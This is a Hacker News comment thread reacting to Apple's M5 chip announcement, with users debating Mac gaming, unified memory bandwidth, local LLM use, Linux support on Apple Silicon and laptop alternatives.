      >Mac dev sucks. You're forced to use macos and xcode (for the final build anyway)

      Having to use xcode "for the final build" is irrelevant to the game development experience.

      • jayd16 18 hours ago

        If you're an indie with just PC hardware it sure as hell matters.

  • leshenka 18 hours ago

    I was very surprised, and pleasantly too, that Cyberpunk 2077 can maintain 60FPS (14", M4 Pro, 24gb RAM) with only occasional dips. Not with full resolution (actually around FullHD), but at least without "frame generation". Turning frame generation on, it now can output 90-100 FPS depending on environment, but VSync is disabled so dips become way more noticeable.

    It even has "for this mac" preset which is good enough that you don't need to tinker with settings to have decent experience.

    The game is paused, almost like becomes "frozen" if it's not visible on screen which helps with battery (it can be in the background without any noticeable impact on battery and temperature). Overall way better experience than I expected.

  • jajuuka 14 hours ago

    Multiple solid reasons have been mentioned from ones created by Apple to ones enforced in software by Apple. One that hasn't been mentioned is the lack of marketshare. Macos market is just tiny and very limited. It's also not a growing market. PC gaming isn't blowing up either but the amount of players is just simply higher.

    Ports to macos have not done well from what I've heard. However you can see ports on PC do really well and have encouraged studios like Sony and SquareEnix to invest more in PC ports. Even much later after the console versions sell well. Just not a lot of reasons to add the tech debt and complexity of supporting mac as well.

    Even big publishers like Blizzard who have been mac devs for a long time axed the dedicate mac team and client and moved to a unified client. This has downfalls like mac specific issues. If those are not critical then they get put in the pile with the rest of the bugs.

  • sosodev 18 hours ago

    It's easier to develop a game for a mac in some ways but you reach a tiny fraction of gamers that way.

    • hangonhn 18 hours ago

      I wonder how that might look once you factor in Apple TV devices. They're pretty weak devices now but future ones can come with M-class CPUs. That's a huge source of potential revenue for Apple.

      • amluto 18 hours ago

        The current Apple TV is, in many respects, unbelievably bad, and it has nothing to do with the CPU.

        Open up the YouTube app and try to navigate the UI. It’s okay but not really up to the Apple standard. Now try to enter text in the search bar. A nearby iPhone will helpfully offer to let you use it like a keyboard. You get a text field, and you can type, and keystrokes are slowly and not entirely reliably propagated to the TV, but text does not stay in sync. And after a few seconds, in the middle of typing, the TV will decide you’re done typing and move focus to a search result, and the phone won’t notice, and it gets completely desynchronized.

        • ascagnel_ 17 hours ago

          The YouTube app has never been good and never felt like a native app -- it's a wrapper around web tech.

          More importantly for games, though, is the awful storage architecture around the TV boxes. Games have to slice themselves up into 2GB storage chunks, which can be purged from the system whenever the game isn't actively running. The game has to be aware of missing chunks and download them on-demand.

          It makes open-world games nearly impossible, and it makes anything with significant storage requirements effectively impossible. As much as Apple likes to push the iOS port of Death Stranding, that game cannot run on tvOS as currently architected for that reason.

  • mavbo 18 hours ago

    I play a lot of World of Warcraft on my M3 MacBook Pro which has a native MacOS build. It's a CPU bottlenecked game with most users recommending the AMD X3D CPUs to achieve decent framerates in high end content. I'm able to run said content at high (7/10) graphics settings at 120fps with no audible fan noise for hours at a time on battery. It's been night and day compared to previous Windows machines.

  • Damogran6 18 hours ago

    There's a cost/value calculation that just doesn't work well...I have a Ryzen9/rtx3070 PC ($2k over time) and my M4 Mini ($450) holds it's own for most all normal user stuff...sprinting ahead for specific tasks (Video CODEC)...but the 6 year old dedicated GPU on the PC annihilates the Mini in pushing pixels...You can spec an Apple that does better for gaming, but man, are you gonna pay for it, and still not keep up with current PC GPUS.

    Now...something like minecraft or SubNautica? The M4 is fine, especially if you're not pushing 4k 240hz.

    Apple has been pushing the gaming experience for years (iPhone 4s?) but it never REALLY seems to land, and when someone has a great gaming seperience in a modern AAA game, they always seem to be using a $4500 Studio or similar.

  • LtdJorge 18 hours ago

    Metal is a very recent API compared to DirectX and OpenGL. Also, there’s very very little people on Mac, and even less that also play videogames. There are almost no libraries and tooling built around Metal and the Mac SDKs, and a very small audience, so it doesn’t make financial sense.

  • spogbiper 18 hours ago

    you have to release major titles for windows and console, because there are tons of customers using them.

    so a mac port, even if simple, is additional cost. there you have the classic chicken and egg problem. the cost doesn't seem to be justified by the number of potential sales, so major studios ignore the platform. and as long as they do, gamers ignore the platform

    i've seen it suggested that Apple could solve this standoff by funding the ports, maybe they have done this a few times. but Apple doesn't seem to care much about it

  • GTP 18 hours ago

    Up to some years ago, it was common for gamers to assemble their own PC, something that you can't do with a Mac. Not sure if this is still common among gamers though.

    • LarsDu88 16 hours ago

      The advent of silicon interposer technology has made modular memory and separate CPU/GPU soon to be obsolete IMO

      The communication bandwidth you can achieve by putting CPU, CPU, and memory together at the factory is much higher than having these components separate.

      Sad for enthusiasts, but practically inevitable

  • viktorcode 16 hours ago

    The porting is not straightforward; you must switch to Metal, you should adapt rendering pipeline to tiled deferred shading.

  • ikamm 18 hours ago

    - have to build using XCode on macOS

    - have to pay Apple to have your executable signed

    - poor Vulkan support

    The hardware has never been an issue, it's Apple's walled garden ecosystem.

  • ProfessorZoom 18 hours ago

    i think it depends on how easy it is for a dev to deploy to apple. M1 was great at running call of duty in a windows emulator. iPhone can run the newest resident evil. apple needs to do more to convince developers to deploy to mac

  • croes 18 hours ago

    Doesn’t MacOS favor an 60Hz output? Gamers prefer much higher rates.

    And don’t forget they made an VR headset without controllers.

    Apple doesn’t care about games

    • jsheard 17 hours ago

      > Doesn’t MacOS favor an 60Hz output?

      Kind of? It does support higher refresh rates, but their emphasis on "Retina" resolutions imposes a soft limit because monitors that dense rarely support much more than 60hz, due to the sheer bandwidth requirements.

      • 333c 11 hours ago

        The MacBook Pro has had a 120 Hz screen for nearly half a decade. And of course, external displays can support whatever resolution/refresh rate, regardless of the OS driving them.

  • yieldcrv 18 hours ago

    It's kind of a myth though, Mac has many flagship games and everything in between

    If you identify as a "gamer" and are in those communities, then you'll see communities talking about things you can't natively play

    but if you leave niches you already have everything

    and with microtransactions, Apple ecosystem users are the whales. again, not something that people who identify as "gamers" wants to admit being actually okay with, but those people are not the revenue of game production.

    so I would say it is a missed opportunity for developers that are operating on antiquated calculations of MacOS deployment

    • bigyabai 15 hours ago

      > It's kind of a myth though

      It's kinda not. Here's a rough list of the 10 most-played games currently on PC: https://steamdb.info/charts/

      macOS is supported by one title (DOTA 2). Windows supports all 10, Linux (the free OS, just so we're clear) runs 7 of the games and has native ports of 5 of them. If you want to go argue to them about missed revenue opportunities then be my guest, but something tells me that DOTA 2 isn't being bankrolled by Mac owners.

      If you have any hard figures that demonstrate "antiquated calculations" then now is the time to fetch them for us. I'm somewhat skeptical.

vardump 20 hours ago

I guess I'm waiting for the M5 Max chip. Hopefully it's configurable with 256 GB RAM for LLMs and some VMs.

mattray0295 17 hours ago

They push these new generations out so quick, and with crazy performance boosts. Impressive

  • elric 14 hours ago

    Meanwhile intel seems to be doing a big bunch of nothing much. And AMD seems busy playing house with OpenAI to catch up to nvidia on the GPU front.

    Now if only Apple would sell these for use outside of their walled garden.

RataNova 2 hours ago

"Over 4x GPU compute performance" sounds wild until you realize it's relative to the M4

brikym 8 hours ago

I just want them to fix all the MacOS liquid 'ass issues.

flakes 7 hours ago

What does “4x the peak GPU compute performance” mean here? No latency difference, but higher throughput? The footnote was not at all helpful

> Performance tests are conducted using specific computer systems and reflect the approximate performance of MacBook Pro.

h1fra 20 hours ago

I keep seeing all those crazy screenshots from games on Mac, and yet there are barely any big releases for this platform. I guess it benefits a whole range of software, not just games, but still that's a pity.

  • tantalor 20 hours ago

    Because gaming on Mac actually looks bad in practice.

    https://news.ycombinator.com/item?id=44906305

    • qnpnp 18 hours ago

      This is easy to fix, not an explanation.

      Gaming on mac is indeed lacking, but that's really not the reason.

      • tantalor 16 hours ago

        It's a symptom of the deeper problem: Apple does not value game developers or the experience of users.

reacharavindh 19 hours ago

One that’s be a nice quality of life improvement in MacBook(Air/Pro) is built-in 5G connectivity. I’d spring for that convenience not needing to connect to a hotspot draining precious battery on my phone. I thought we were closer given Apple started making their own modems, but it is still a miss.

  • port3000 17 hours ago

    They want you to buy the Apple phone and pair it, so they sell more

heystefan 21 hours ago

Is it me or did they use to avoid calling it "AI"?

  • simonw 21 hours ago

    Yeah, they rebranded it "Apple Intelligence" but this press release appears to be mostly using AI in the same (vague) way that the rest of the industry does.

    Also just noticed this:

    "And now with M5, the new 14-inch MacBook Pro and iPad Pro benefit from dramatically accelerated processing for AI-driven workflows, such as running diffusion models in apps like Draw Things, or running large language models locally using platforms like webAI."

    First time I've ever heard of webAI - I wonder how they got themselves that mention?

    • rgo 18 hours ago

      > First time I've ever heard of webAI - I wonder how they got themselves that mention?

      I wondered the same. Went into Crunchbase and found out Crunchbase are now fully paywalled (!), well saw that coming... Anyway, hit the webAI blog, apparently they were showcased at the M4 Macbook Air event in 2024 [1] [2]:

      > During a demonstration, a 15-inch Air ran a webAI’s 22 billion parameter Companion large language model, rendered a 4K image using the Blender app, opened several productivity apps, and ran the game Wuthering Waves without any kind of slowdown.

      My guess is this was the best LLM use-case Apple could dig-up for their local-first AI strategy. And Apple Silicon is the best hardware use-case webAI could dig-up for their local-first AI strategy. As for Apple, other examples would look too hacky, purely dev-oriented and depend on LLM behemoths from US or China. Ie "try your brand-new performant M5 chip with LM Studio loaded with China's Deepseek or Meta's Llama" is an Apple exec no-go.

      1. https://www.webai.com/blog/why-apples-m4-macbook-air-is-a-mi...

      2. https://finance.yahoo.com/news/apple-updates-bestselling-mac...

anteloper 14 hours ago

I can't find a single moore's law chart that includes 2025 data (they all seem to cut off around 2020 actually).

Does anyone know if we're still on pace with Moore's law?

t1234s 15 hours ago

Any reason they don't have an apple TV pro with an M* chip that's targeted towards gaming?

  • quentindanjou 15 hours ago

    I think it is because there are not enough games to be the reason for integrating an M* chip.

    • boogieknite 14 hours ago

      probably right but on the other hand Apple is willing to throw mountains of $ at tv+ productions just to get ppl on their platform

      an economist could probably tell me why portioning some of that money to spend on game port budget isnt valuable. gamepass seems ripe to be undercut too

  • NetMageSCW 10 hours ago

    Because the A* iPhone chip in the Apple TV should be more than enough for HD quality gaming?

ud0 2 hours ago

Yes, but where are the production desktop app using on-device AI right now?

dmitshur 5 hours ago

It’ll be interesting to see how quickly this chip becomes available in the MacBook Air and Mac mini. So far those still have the previous M4 only.

If it doesn’t happen later this week, how long would the wait be? A few months? More?

  • operatingthetan 4 hours ago

    Apple seems to be following a regular schedule of new Macbook Pros in October and Macbook Airs in March. Could change though!

drnick1 15 hours ago

A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux. I simply don't want to live in Apple's walled garden.

Then there is the whole ARM vs x86 issue. Even if a compatible Linux distro were made, I expect to run all kinds of software on my desktop rig including games, and ARM is still a dead end for that. For laptops, it's probably a sensible choice now, but we're still far from truly free and usable ARM desktop.

  • littlecranky67 14 hours ago

    > A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux.

    They run Linux actually very well, have you ever tried Parallels or VMware Fusion? Especially Parallels ships with good softwaer drivers for 2d/3d/video acceleration, suspend, and integration into the host OS. If that is not your thing, the new native container solution in Tahoe can run container from dockerhub and co.

    > I simply don't want to live in Apple's walled garden.

    And what walled garden would that be on macOS? You can install what you want, and there is homebrew at your fingertips with all the open and non-open software you can ask for.

    • mixmastamyk 13 hours ago

      Last I looked... extensive telemetry and a sealed boot volume that makes it impractical to turn off even if theoretically possible. There are other problems of course.

      • TypesWillSaveUs 12 hours ago

        You can disable SIP and even disable immutable kernel text, load arbitrary drivers, enable/disable any feature, remove any system daemon, use any restricted entitlements. The entire security model of macOS can be toggled off (csrutil from recoveryOS).

        • mixmastamyk 11 hours ago

          Aware of that. Way too big of a request just to make reasonable configuration changes, like shutting down daemons, etc.

          • Klonoar 11 hours ago

            No, it’s not that big a request. You literally have the capability. The average user does not need it.

            What is hard about this?

            • mixmastamyk 8 hours ago

              Stopping/disabling a service should be a command, like it is on Windows or Linux. Not configured on a read-only volume bundled with other security guarantees.

              It's pretty simple to keep these two things separate, like everywhere else in the present and history of the industry.

              • Klonoar 8 hours ago

                Just because Windows/Linux do things one way doesn't mean the rest of the industry has to follow it. ;P

      • niek_pas 12 hours ago

        Just out of curiosity, are these philosophical objections or do you have a practical use for disabling code signing and messing with your boot volume?

        • mixmastamyk 11 hours ago

          I have practical use for disabling telemetry and other misfeatures. (Maybe you meant to reply to your sibling comment?)

        • littlecranky67 4 hours ago

          He's a religious linux believer that will make you call him GNU/Linux believer - no point in argueing, there is not interest in the argument.

    • kaladin-jasnah 6 hours ago

      From what I checked, disabling SIP/AMFI/whatever it is now means I can't run iOS applications on macOS. The fact that there are restrictions on what I can run when doing that makes macOS more restrictive.

      Also, what if I want to run eBPF on my laptop on bare metal, to escape the hypercall overhead from VMs or whatever? Ultimately, a VM is not the same as a native experience. I might want to take advantage of acceleration for peripherals that aren't available unless I'm bare metal.

      • littlecranky67 3 hours ago

        That point is often brought up, but it kind of invalid. Because you can't run iOS on your Linux or Windows installation, too. So saying because of that usecase you are switching the OS, is kind of a spite reaction, not based on reason.

        As in: "I can't run iOS on my macOS installation, so I am going to use a different OS where I can't run iOS either".

        • davkan 16 minutes ago

          Well it’s just one less plus in the macOS column.

          I switched from pixel to iPhone in large part because pixel removed the rear fingerprint reader, headphone jack, and a UI shortcut I used multiple times a day. It’s not like the iPhone had those things but now neither did the pixel.

    • cholantesh 9 hours ago

      How does Asahi fare these days? For home use I am fine with my Fedora machine but as a former (Tiger-SL era) Mac user who's never used macOS, I am somewhat curious about this.

      • andyferris 8 hours ago

        Remember Asahi works properly only on M1 and M2. More work is required to make it run well on later chips (its not just a faster ARM chip - it's new graphics card each time, motherboard chipset, every laptop peripheral changes from time to time, BIOS/UEFI, etc, and they all need reverse-engineered drivers for it work).

    • ed_mercer 9 hours ago

      Would it be possible to run a whole linux OS on macos, even if through virtualization?

    • imoverclocked 13 hours ago

      ... or UTM. I have run windows and Linux on my M1 MB Pro with plenty of success.

      Windows - because I needed it for a single application.

      Linux - has been extremely useful as a compliment to small arm SBCs that I run. eg: Compiling a kernel is much faster there than on (say) a Raspberry Pi. Also, USB device sharing makes working with vfat/ext4 filesystems on small memory cards a breeze.

  • bee_rider 8 hours ago

    It sounds like Linux works fairly well on Strix Halo, which basically gives Apple a run for their money and stays in the nice x86 land. The M1 and M2 chips were envy-inducing chips from the heavens or whatever, but now that the mortals have caught up I don’t really see the point in worrying about Linux on ARM. X86 remains the present, RISC-V is the future.

  • geek_at 14 hours ago

    I'm still looking for a decent ARM laptop that runs linux well. I have my eye on one from lenovo but linux support is still not the best

  • drcode 13 hours ago

    M1 and M2 Macs run Asahi Linux very well (but no option for M3,M4,M5 yet)

  • baka367 5 hours ago

    Meanwhile I finally bought into apple after my nth unsuccessful attempt to break into linux.

    I just want a linux-like system that is not mainful to use and apple's is the closest thing that worked for me without resorting to last ditch efforts like sacrificing virgin maidens or newborn kittens on top of my Dell machine... and Apple provides one that just works ... reliably

    • stevage 5 hours ago

      Ha, I came crawling back to macOS after a couple of years' dalliance with Windows. It was not a good experience.

  • visionscaper 6 hours ago

    Isn’t to core of MacOS derived from Unix?

  • a456463 12 hours ago

    I came to chime in. I have hardware that apple chooses to willfully upsell me on repairing and $1500 for $35 keyboard repair. Apple as a company is still terrible at recycling and manufacturing obseletion. It is also a walled garden with no choice as to what you can do on your machines.

  • jokoon 12 hours ago

    honestly, computing speed doesn't matter that much anymore

    I mean as long as the law of wirth does not bite too hard

  • gffrd 14 hours ago

    [flagged]

    • jokoon 12 hours ago

      [flagged]

      • gffrd 6 hours ago

        My point was: we don’t need to list all the reasons we won’t buy apple products on any post about apple, even if it has nothing to do with the article.

        We’ve beaten the horse many times over.

gr4vityWall 11 hours ago

if only the Linux support was good. Or any other UNIX-like that made it usable without having to deal with macOS. It's a shame, because the hardware is top tier.

gmm1990 20 hours ago

Interesting that there's only the m5 on the macbook pro. I thought the m4 and m4 pro/max were at the same time on the macbook pro

GeekyBear 19 hours ago

I'd argue that calling the new matrix multiplication unit they added to the GPU cores a neural engine instead of a tensor processing unit is a branding error that will lead to confusion.

The existing neural engine's function is to maximize power efficiency, not flexible performance on models of any size.

  • bigyabai 17 hours ago

    I'd argue that Apple's definition of "neural engine" was entirely different from what the greater desktop, edge and datacenter markets already considered a "neural engine" to be.

    It's an improvement, nomenclature-wise.

gzer0 20 hours ago

M5 Chip currently only avaialble with up to 32 GB of RAM on the 14 inch Macbook pro variant, just FYI.

[1] https://www.apple.com/us-edu/shop/buy-mac/macbook-pro/14-inc...

  • pixelpoet 20 hours ago

    That's laughable in 2025, and together with the wimpy 153 GB/s memory bandwidth (come on, Strix Halo is 256GB/s at a fraction of the price!) they really don't have a leg to stand on calling this AI-anything!

    • hannesfur 19 hours ago

      As pointed out in other places as well a better comparison will be the upcoming Pro & Max variants. Also, as far as I know, Strix Halo mainly uses the GPU for inference not the little AI accelerator AMD has put on there. That one is just to limited.

    • Tepix 19 hours ago

      So you're saying these won't sell at all?

      • pixelpoet 19 hours ago

        I'm saying this is pretty weaksauce for AI-anything in 2025, especially considering the price tag. Sure, there will be later models with more memory and bandwidth (no doubt at eye-watering prices), but with 32 GB this model isn't it.

        I'm sure it's a perfectly fine daily driver, but you have to appreciate the irony of a massive chip loaded to the gills with matrix multiplication units, marketed as an amazing AI machine, and yet so hobbled by mem capacity and bandwidth.

balderdash 8 hours ago

I find the Apple naming conventions / product updates confusing.

The MacBook Pro with the m5 is the low end model? an M2 Ultra is better than the m5?

I understand what they’re doing from a roadmap standpoint - but as a pure consumer is a bit confusing

allenrb 16 hours ago

I’d like a filter to remove all mention of AI and associated performance from copy like this. Maybe I can build it with… nvm.

Seriously, can’t you tell me about the CPU cores and their performance?

  • wina 16 hours ago

    why do you want more CPU cores and better performance than the M4, if not for running local AI models?

    • Remnant44 15 hours ago

      Essentially ever other use case for a computer.

      Whether you're playing games, or editing videos, or doing 3D work, or trying to digest the latest bloated react mess on some website.. ;)

    • sib 16 hours ago

      Photo & video post-processing...

    • allenrb 12 hours ago

      I… think you’re joking, but I can’t be sure.

    • adastra22 16 hours ago

      COU cores aren’t relevant to running AI?

textlapse 15 hours ago

I wonder how much of the nVidia DGX Spark announcement was meant to precede this M5 announcement by a day or two; M5 MBP has higher performance with a monitor attached and with a (bit) lower price tag.

If you could yank the screen out, it probably evens out :)

I have seen quite a few such announcements from competitors that tend to be so close that I wonder if they have some competitor analysis to precede the Goliath by a few days (like Google vs rest, Apple vs rest etc).

zhyder 14 hours ago

"complementing the Neural Accelerators in the CPU and GPU" seems to be a misprint; I don't believe they have the accelerators in the CPU too.

Still super interesting architecture with accelerators in each GPU core _and_ a dedicated neural engine. Any links to software documentation for how to leverage both together, or when to leverage one vs the other?

umvi 14 hours ago

I would buy a mac mini with an M* chip in the blink of an eye if merely upgrading the RAM didn't double the cost of the unit

  • NetMageSCW 10 hours ago

    You’re in luck then, it doesn’t double the cost.

    • umvi 7 hours ago

      It's pretty close to double. Sorry, but I just can't justify $400 for a measly 16GB of RAM

alberth 20 hours ago

Vision Pro went from M2 to M5, that's quite a jump in horse-power.

  • adamschwartz 17 hours ago

    Also ~200g heavier due in part to the counterweight in the new strap.

    • cagenut 7 hours ago

      hmmm thats 200g in the wrong direction

sebastianconcpt 20 hours ago

Wonder how it compares with the M4 Max that I've just bought haha

  • dmix 20 hours ago

    Same I just bought an M4 Max 2 weeks ago and had a bit of anxiety for a moment. I'm going to justify it because they haven't released M5 Max yet

    • sebastianconcpt 20 hours ago

      It's going to be fine, what's important is what we do with the thingy :)

      Logos is King

thefounder 7 hours ago

Is my M2 Ultra studio with 128GB of ram just “dead weight” now? Wish I would have got just a Mac mini or Mac Pro….

zoobab 20 hours ago

Does it run Linux?

  • amlib 11 hours ago

    It doesn't also run Crysis, and if was left for apple to decide it wouldn't even run DOOM.

criddell 19 hours ago

I wish I could get the nano texture glass on a lower spec iPad Pro. I probably only need the 512 GB model and the glass is only available on 1 and 2 TB modes.

anuraj 13 hours ago

Too underwhelming. Apple under Tim Cook has been running out of steam. What prevents Apple from having 100s of GPU cores and higher memory bandwidth? They need to catch the AI wave before they perish under it.

  • ed_mercer 8 hours ago

    Underwhelming? They are crushing any competition by a large margin.

  • pertymcpert 13 hours ago

    What are you talking about? People love Macs for running local LLMs.

    • hu3 12 hours ago

      For real work tho? My colleagues couldn't get past toy demos.

      And it ruins battery life.

      For coding it's on par with GPT3 at best which is amateur tier these days.

      It's good for text to speech and speech to text but PCs can do that too.

      • cactusplant7374 11 hours ago

        Why would anyone run AI workloads without being plugged in? It's going to trash your battery.

maxk42 18 hours ago

For my use case I need MSL to support fp64. Until that happens I don't care what hardware changes they make: I'm not going to be filling racks with M5s and they're not producing something I can use to even tinker with AI with in my spare time. Apple has lost the AI war before it even got started IMO.

jon-wood 20 hours ago

> Apple 2030 is the company’s ambitious plan to be carbon neutral across its entire footprint by the end of this decade by reducing product emissions from their three biggest sources: materials, electricity, and transportation.

But never, ever, through not shipping incremental hardware bumps every year regardless of whether there's anything really worth shipping.

  • asdhtjkujh 19 hours ago

    Very few people are buying a new machine every year, even when the updates (like this year) are arguably more than incremental — selling outdated hardware that will become obsolete sooner is not more environmentally-friendly.

    Hardware longevity and quality are probably the least valid criticisms of the current Macbook lineup. Most of the industry produces future landfill at an alarming rate.

  • nozzlegear 7 hours ago

    Surely people just won't buy it if it's not worth shipping?

  • Cthulhu_ 19 hours ago

    I'm always skeptical about these carbon neutral pledges because in practice it's a lot of administrative magic, like paying a company that says they will plant trees or whatever which will sign some official looking paper saying 'ye apple totaly compensated three morbillion tonnes of carbon emissions'.

    And it's things like not including a charger, cable, headphones anymore to reduce package size, which sure, will save a little on emissions but it's moot because people will still need those things.

  • SG- 19 hours ago

    second hand Apple market is very big, especially since M series MacBooks leapfrogged performance.

benjaminclauss 20 hours ago

Despite the flak Apple gets, there M-series continues to impress me as I learn more about hardware.

jbjbjbjb 20 hours ago

I’m glad I opted to get the base model M4 Mac Mini rather than upgrade the memory for longevity.

jasoneckert 21 hours ago

With the same number and types (P/E) of cores, the M5 seems more like a feature refinement over M4. I wonder if this is a CPU that Apple released primarily for AI marketing purposes and perception, rather than to push the envelope.

elnatro 13 hours ago

I don’t understand why they don’t advertise this cpu as one capable of running local LLMs, because it can, right?

perdomon 13 hours ago

It's kind of crazy that they insist on doing basically one of these every year. A lot of people complain that the iPhone stopped changing (meaningfully) between updates several years back. I think Apple Silicon is bound to be the same. I will say that the M4 Mac Mini was groundbreaking in terms of a budget-friendly Apple product -- I hope they recognized why it was loved and continue to iterate in that direction.

rcarmo 17 hours ago

I'll take one inside an iPad mini, thank you very much.

randomtoast 21 hours ago

A unified memory bandwidth of 1,224 gigabits per second is quite impressive.

  • vardump 21 hours ago

    Probably gigabytes (GB) and not gigabits (Gb)?

    Edit: gigabits indeed. Confusing, my old M2 Max has 400 GB/s (3200 gigabits per second) bandwidth. I guess it's some sort of baseline figure for the lowest end configuration?

    Edit 2: 1,224 Gbps equals 153 GB/s. Perhaps M5 Max will have 153 GB/s * 4 = 612 GB/s memory bandwidth. Ultra double that. If anyone knows better, please share.

  • mihau 21 hours ago

    why? M3 Ultra already had 800 GB/s (6400 gbps) memory bandwidth

    • NetMageSCW 20 hours ago

      But what did the base M3 have? Why compare to different categories?

      Edit: Apparently 100GB/s, so a 1.5x improvement over the M3 and a 1.25x improvement over the M4. That seems impressive if it scales to Pro, Max and Ultra.

    • sapiogram 20 hours ago

      And that was already impressive. High-end gaming computers with dual-channel DDR5 only reach ~100GB/s of CPU memory bandwidth.

      • Aurornis 20 hours ago

        High end gaming computers have far more memory bandwidth in the GPU, though. The CPU doesn’t need more memory bandwidth for most non-LLM tasks. Especially as gaming computers commonly use AMD chips with giant cache on the CPU.

        The advantage of the unified architecture is that you can use all of the memory on the GPU. The unified memory architecture wins where your dataset exceeds the size of what you can fit in a GPU, but a high end gaming GPU is far faster if the data fits in VRAM.

        • NetMageSCW 10 hours ago

          The other advantage is you don’t have to transfer assets across slow buses to get it into that high speed VRAM.

      • RossBencina 20 hours ago

        Right, but high-end gaming GPUs exceed 1000GB/s and that's what you should be comparing to if you're interested in any kind of non-CPU compute (tensor ops, GPU).

      • Rohansi 17 hours ago

        And you can find high-end (PC) laptops using LPDDR5x running at 8533 MT/s or higher which gives you more bandwidth than DDR5.

  • Havoc 20 hours ago

    I was looking at that number and thinking opposite - that's oddly slow at least in context of new apple chip.

    Guessing that's their base tier and it'll increase on the higher spec/more mem models.

    • Retr0id 20 hours ago

      Perhaps they're worried that if they make the memory bandwidth too good, people will start buying consumer apple devices and shoving them into server racks at scale.

  • modeless 20 hours ago

    Nvidia DGX Spark has 273 GB/s (2184 gigabits with your units) and people are saying it's a disappointment because that's not enough for good AI performance with large models. All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

    • hannesfur 19 hours ago

      > All the neural accelerators in the world won't make it competitive in speed with discrete GPUs that all have way more bandwidth.

      That’s true for the on-GPU memory but I think there is some subtlety here. MoE models have slimmed the difference considerably in my opinion, because not all experts might fit into the GPU memory, but with a fast enough bus you can stream them into place when necessary.

      But the key difference is the type of memory. While NVIDIA (Gaming) GPUs ship with HBM memory ship for a while now, the DGX Spark and the M4 use LPDDR5X which is the main source for their memory bottleneck. And unified memory chips with HBM memory are definitely possible (GH200, GB200), they are just less power efficient on low/idle load.

      NVIDIA Grace sidestep: They actually use both HBM3e (GPU) and LPDDR5X (CPU) for that reason (load characteristics).

      The moat of the memory makers is just so underrated…

thurn 21 hours ago

No "max" or "pro" equivalent? I wanted to get a new Macbook Pro, but there's no obvious successor to the M4 Max available, M5 looks like a step down in performance if anything.

nblgbg 19 hours ago

32GB is the maximum memory configuration for the 14-inch laptop, which isn’t sufficient for running local LLMs. I think a Mac Studio or Mac Mini with higher memory would be more useful.

newman8r 14 hours ago

What's sad is there's still no asahi support for m4. I have one and I barely ever use it for that reason.

mrkaluzny 13 hours ago

Emm… why it says that a charger is not included on the purchase. That’s just crazy.

SXX 20 hours ago

32GB RAM limit on current M5 models. Now wait for M5 Max.

  • bombcar 20 hours ago

    M5 Max Macs

    If they're studios, you can have stacks of M5 Max Macs.

dmitshur 19 hours ago

The claimed 1.6x increase in video game frame rate compared to M4 seems pretty good. Looking forward to seeing it tested out in practice.

mrbonner 18 hours ago

I'm waiting for the day when the iphone would be equipped with an M chip. Maybe not long of a wait I hope.

airza 21 hours ago

I get they want to have a lot of their own swift-based bindings but I wish they could also keep their MPS pytorch bindings up to date...

Insanity 19 hours ago

Assume they released this ahead of their end of month event in response to all the leaks from the past weeks.

ChuckMcM 15 hours ago

I think it would be amazing to be able to buy an M5 based open platform.

willahmad 21 hours ago

Are we going to see SOTA local coding models anytime soon with this hardware or is it still long way to go?

  • Etheryte 20 hours ago

    You can already do that, just how slow or fast you go depends on how much you're ready to pay for memory. It's a $1200 premium to go from 36GB to 128GB of unified memory, that cost is hard to justify unless you really need it, or if someone else is paying.

    • willahmad 20 hours ago

      None is comparable to GPT-5 or Sonnet 4.5 experience

      • elzbardico 15 hours ago

        Frankly, right now I am way more satisfied with qwen-3-coder-420 using Cerebras inference than with those more powerful models.

        Inference speed and fast feedback matter a lot more than perfect generation to me.

sbbq 20 hours ago

The chips are great. Now they just need to improve the quite stagnant laptop hardware to go with it.

aetherspawn 14 hours ago

Wish boot camp was free again… sick of paying for parallels.

pier25 19 hours ago

Does the M5 feature the UltraFusion connector which would enable the Ultra variant?

  • ozaiworld 19 hours ago

    that would likely only be present on the Max chip of the M5 generation

    • pier25 16 hours ago

      thanks I had always assumed it needed to be present in the base design of the chip

jdlyga 20 hours ago

If only the Windows ecosystem could make the processor transition as smooth as Mac.

  • lostmsu 19 hours ago

    I don't think it is the ecosystem. The ARM CPUs not from Apple are just too slow.

    • wmf 17 hours ago

      X Elite and N1X are fine; the problem is with Windows.

      • bigyabai 14 hours ago

        As someone who admins Linux and Windows ARM machines, rest assured the issue is not just with Windows. ARM support is best-effort on most distros, and still fairly incomplete even on nixpkgs and Debian unstable.

zelias 12 hours ago

Do I want to buy this, an M1 or an M4?

mittermayr 19 hours ago

This morning I was looking to maybe replace my Macbook Pro 2018, which had the horrible keyboard and finally seems to be crippled enough to not be fun to use anymore — now this!

However, I have been disappointed by Apple too many times (they wouldn't replace my keyboard despite their highly-flamed design-faux-pas, had to replace the battery twice by now, etc.)

Two years ago I finally stopped replacing their expensive external keyboards, which I used to buy once a year or every other (due to broken key-hinges) and have been so incredibly positively surprised by getting used to the MX Keys now. Much better built, incredible mileage for the price. Plus, I can easily switch and use them on my Windows PC, too.

So, about the Macbook — if I were to switch mobile computing over to Windows, what can I replace it with? My main machine is still a Mac Mini M2 Pro, which is perfect value/price. I like the Surface as a concept (replacable keyboards are a fantastic idea, battery however, super iffy nonsense), and I've got a Surface Pro 6 around, but it's essentially the same gloss-premium I don't need for my use.

Are there any much-cheaper but somewhat comparable laptops (12h+ battery, 1 TB disk, 16-32GB RAM, 2k+ Display) with reasonable build quality? Does bypassing the inherent premium of all the Apple gloss open up any useful options? Or is Apple actually providing the best value here?

Would love to hear from non-Surface, non-Thinkpad (I love it, but) folks who've got some recommendations for sub $1k laptops.

Not my main machine, but something I take along train rides, or when going to clients, or sometimes working offsite for a day.

  • vachina 17 hours ago

    LG Gram SuperSlim. Very light (900grams). I once went hiking with it and forgot the laptop was still in the bag.

    But its really only capable of high performance in short bursts because of the extremely small thermal mass.

    • mittermayr 17 hours ago

      thanks for the hint, spec-wise, this is exactly what I meant, 1tb ssd, 16gb ram, 16 hours of battery, very nice. then I saw it's 1700 EUR where I am at the moment, so pretty much Macbook Pro price :(

waterTanuki 10 hours ago

I can't imagine how frustrating it must be to be making some of the best hardware out there only to have it completely wasted on useless "liquid glass" UIs and locked down to a half-baked OS (looking at you iPadOS).

looneysquash 17 hours ago

Thats cool, but so much software only supports CUDA.

mrlonglong 17 hours ago

Good old Brits, taking over the world with an ISA extraordinarily efficient that at inception they discovered that the processor still kept operating by sucking voltage from leakage currents even though the power was off.

From: https://www.theregister.com/2012/05/03/unsung_heroes_of_tech...

